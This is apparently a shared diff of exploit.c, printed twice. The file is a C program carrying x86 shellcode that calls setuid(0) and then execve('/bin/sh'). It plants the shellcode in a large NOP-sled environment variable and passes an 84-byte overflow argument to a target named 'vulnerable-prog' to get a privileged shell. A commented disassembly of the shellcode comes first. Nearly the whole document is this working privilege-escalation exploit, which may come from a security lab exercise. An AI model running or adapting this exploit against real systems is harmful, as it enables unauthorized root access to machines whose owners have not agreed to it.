jacobcxdev · April 1, 2022 01:08
diff --git a/exploit.c b/exploit.c
 #include <unistd.h>
 #include <stdio.h>
 #include <string.h>

 /* 
 Disassembled shellcode program (after doing some arrangements)
 1:  31 c0                   xor    eax,eax			-
 2:  31 db                   xor    ebx,ebx 	 		 |--> ?
 4:  b0 d5                   mov    al,0xd5			 |
 6:  cd 80                   int    0x80			    -

 8:  eb 18                   jmp    0x22 			              -
 a:  5e                      pop    esi				               |
 b:  89 76 08                mov    DWORD PTR [esi+0x8],esi	 |
 e:  31 c0                   xor    eax,eax	 		             |
 10: 88 46 07                mov    BYTE PTR [esi+0x7],al  	 |
 13: 89 46 0c                mov    DWORD PTR [esi+0xc],eax	 |
 16: b0 0b                   mov    al,0xb 	 		             |--> Shellcode Assembly Code
 18: 89 f3                   mov    ebx,esi	 		             |
 1a: 8d 4e 08                lea    ecx,[esi+0x8] 	 	         |
 1d: 8d 56 0c                lea    edx,[esi+0xc] 	 	         |
 20: cd 80                   int    0x80 	 		               |
 22: e8 e3 ff ff ff          call   0xa 	 			               |
 23 .ascii "/bin/sh<garbage>" 					                      -
 */

 #define SHELLCODE "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"

 #define ENV_BLOCK_SIZE 127000
 #define OVF_BUF_SIZE 84

 int main(void) {
  char envbuf[ENV_BLOCK_SIZE + 1];
  char ovfbuf[OVF_BUF_SIZE + 1];
  char *argv[3];
  char *envp[2];
  int i;

  memcpy(envbuf, "SHELLCODE=", 10);
  memset(envbuf + 10, 0x90, ENV_BLOCK_SIZE - 10 - strlen(SHELLCODE));
  memcpy(envbuf + ENV_BLOCK_SIZE - OVF_BUF_SIZE, SHELLCODE, strlen(SHELLCODE));
  envbuf[ENV_BLOCK_SIZE] = '\0';

  for (i = 0; i < OVF_BUF_SIZE; i++) {
     	ovfbuf[i] = SHELLCODE[i];
  }
  ovfbuf[i] = '\0';

  argv[0] = "vulnerable-prog"; // "vulnerable";
  argv[1] = ovfbuf;
  argv[2] = NULL;

  envp[0] = NULL;
  envp[1] = NULL;

  execve(argv[0], argv, envp);
 }
	#include <unistd.h>
	#include <stdio.h>
	#include <string.h>

	/*
	Disassembled shellcode program (after doing some arrangements)
	1: 31 c0 xor eax,eax -
	2: 31 db xor ebx,ebx \|--> ?
	4: b0 d5 mov al,0xd5 \|
	6: cd 80 int 0x80 -

	8: eb 18 jmp 0x22 -
	a: 5e pop esi \|
	b: 89 76 08 mov DWORD PTR [esi+0x8],esi \|
	e: 31 c0 xor eax,eax \|
	10: 88 46 07 mov BYTE PTR [esi+0x7],al \|
	13: 89 46 0c mov DWORD PTR [esi+0xc],eax \|
	16: b0 0b mov al,0xb \|--> Shellcode Assembly Code
	18: 89 f3 mov ebx,esi \|
	1a: 8d 4e 08 lea ecx,[esi+0x8] \|
	1d: 8d 56 0c lea edx,[esi+0xc] \|
	20: cd 80 int 0x80 \|
	22: e8 e3 ff ff ff call 0xa \|
	23 .ascii "/bin/sh<garbage>" -
	*/

	#define SHELLCODE "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"

	#define ENV_BLOCK_SIZE 127000
	#define OVF_BUF_SIZE 84

	int main(void) {
	char envbuf[ENV_BLOCK_SIZE + 1];
	char ovfbuf[OVF_BUF_SIZE + 1];
	char *argv[3];
	char *envp[2];
	int i;

	memcpy(envbuf, "SHELLCODE=", 10);
	memset(envbuf + 10, 0x90, ENV_BLOCK_SIZE - 10 - strlen(SHELLCODE));
	memcpy(envbuf + ENV_BLOCK_SIZE - OVF_BUF_SIZE, SHELLCODE, strlen(SHELLCODE));
	envbuf[ENV_BLOCK_SIZE] = '\0';

	for (i = 0; i < OVF_BUF_SIZE; i++) {
	ovfbuf[i] = SHELLCODE[i];
	}
	ovfbuf[i] = '\0';

	argv[0] = "vulnerable-prog"; // "vulnerable";
	argv[1] = ovfbuf;
	argv[2] = NULL;

	envp[0] = NULL;
	envp[1] = NULL;

	execve(argv[0], argv, envp);
	}